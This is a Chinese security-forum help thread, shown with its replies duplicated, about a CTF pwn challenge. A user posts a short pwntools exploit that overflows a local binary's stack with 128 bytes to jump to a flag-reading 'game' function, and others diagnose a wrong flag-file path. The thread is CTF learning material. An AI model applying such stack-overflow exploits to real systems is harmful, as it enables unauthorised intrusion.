[求助]pwn类型，希望各位师傅给点意见-求助问答-看雪-安全社区|安全招聘|kanxue.com

最新回复 (5)
R0g 雪币： 1223 活跃值： (4727) 能力值： ( LV6，RANK：90 ) 在线值：发帖 3 回帖 129 粉丝 113 关注私信	R0g 2 2 楼栈溢出修改函数返回地址到game，调用game读取flag 2023-10-8 03:37 1
GUANZHI_ 雪币： 193 活跃值： (1169) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 16 粉丝 0 关注私信	GUANZHI_ 3 楼大佬有没有具体的做法，我打本地的话，模仿其中写了一个flag，之后调用game的地址0x0804855c，但是一直无法输出flag的结果，下面是我的exp： from pwn import * sh = process("./pwn2") context.arch='i386' sh.recv() elf = ELF("./pwn2") print(hex(elf.symbols["game"])) game_addr = 0x0804855c payload = b'a'*128+p32(game_addr) //gdb调试得到的偏移是128 sh.send(payload) sh.interactive() 2023-10-8 08:13 0
mingyuexc 雪币： 704 活跃值： (1641) 能力值： ( LV5，RANK：65 ) 在线值：发帖 2 回帖 13 粉丝 3 关注私信	mingyuexc 4 楼测试了一下，你给的脚本确实可以打通本地，考虑你flag文件:1. 路径是否正确. 2.是否具有读取权限，尝试给定777权限。 2023-10-8 09:32 1
R0g 雪币： 1223 活跃值： (4727) 能力值： ( LV6，RANK：90 ) 在线值：发帖 3 回帖 129 粉丝 113 关注私信	R0g 2 5 楼 GUANZHI_ 大佬有没有具体的做法，我打本地的话，模仿其中写了一个flag，之后调用game的地址0x0804855c，但是一直无法输出flag的结果，下面是我的exp：from pwn& ... 本地有个毛的flag，你系统里恐怕连/home/ctf这个目录都没有吧。不过pwn代码是没问题的最后于 2023-10-8 12:06 被R0g编辑，原因： 2023-10-8 12:05 0
GUANZHI_ 雪币： 193 活跃值： (1169) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 16 粉丝 0 关注私信	GUANZHI_ 6 楼 R0g GUANZHI_ 大佬有没有具体的做法，我打本地的话，模仿其中写了一个flag，之后调用game的地址0x0804855c，但是一直无法输出fla ... 这个我写了一个flag，在root权限下有home路径，在里面创建文件夹与flag文件是可以的，错误原因是4楼大佬说的刚开始写错路径了，写在本地Home下，而不是home下，大小写问题 2023-10-8 21:59 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (5)
R0g 雪币： 1223 活跃值： (4727) 能力值： ( LV6，RANK：90 ) 在线值：发帖 3 回帖 129 粉丝 113 关注私信	R0g 2 2 楼栈溢出修改函数返回地址到game，调用game读取flag 2023-10-8 03:37 1
GUANZHI_ 雪币： 193 活跃值： (1169) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 16 粉丝 0 关注私信	GUANZHI_ 3 楼大佬有没有具体的做法，我打本地的话，模仿其中写了一个flag，之后调用game的地址0x0804855c，但是一直无法输出flag的结果，下面是我的exp： from pwn import * sh = process("./pwn2") context.arch='i386' sh.recv() elf = ELF("./pwn2") print(hex(elf.symbols["game"])) game_addr = 0x0804855c payload = b'a'*128+p32(game_addr) //gdb调试得到的偏移是128 sh.send(payload) sh.interactive() 2023-10-8 08:13 0
mingyuexc 雪币： 704 活跃值： (1641) 能力值： ( LV5，RANK：65 ) 在线值：发帖 2 回帖 13 粉丝 3 关注私信	mingyuexc 4 楼测试了一下，你给的脚本确实可以打通本地，考虑你flag文件:1. 路径是否正确. 2.是否具有读取权限，尝试给定777权限。 2023-10-8 09:32 1
R0g 雪币： 1223 活跃值： (4727) 能力值： ( LV6，RANK：90 ) 在线值：发帖 3 回帖 129 粉丝 113 关注私信	R0g 2 5 楼 GUANZHI_ 大佬有没有具体的做法，我打本地的话，模仿其中写了一个flag，之后调用game的地址0x0804855c，但是一直无法输出flag的结果，下面是我的exp：from pwn& ... 本地有个毛的flag，你系统里恐怕连/home/ctf这个目录都没有吧。不过pwn代码是没问题的最后于 2023-10-8 12:06 被R0g编辑，原因： 2023-10-8 12:05 0
GUANZHI_ 雪币： 193 活跃值： (1169) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 16 粉丝 0 关注私信	GUANZHI_ 6 楼 R0g GUANZHI_ 大佬有没有具体的做法，我打本地的话，模仿其中写了一个flag，之后调用game的地址0x0804855c，但是一直无法输出fla ... 这个我写了一个flag，在root权限下有home路径，在里面创建文件夹与flag文件是可以的，错误原因是4楼大佬说的刚开始写错路径了，写在本地Home下，而不是home下，大小写问题 2023-10-8 21:59 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

未解决 [求助]pwn类型，希望各位师傅给点意见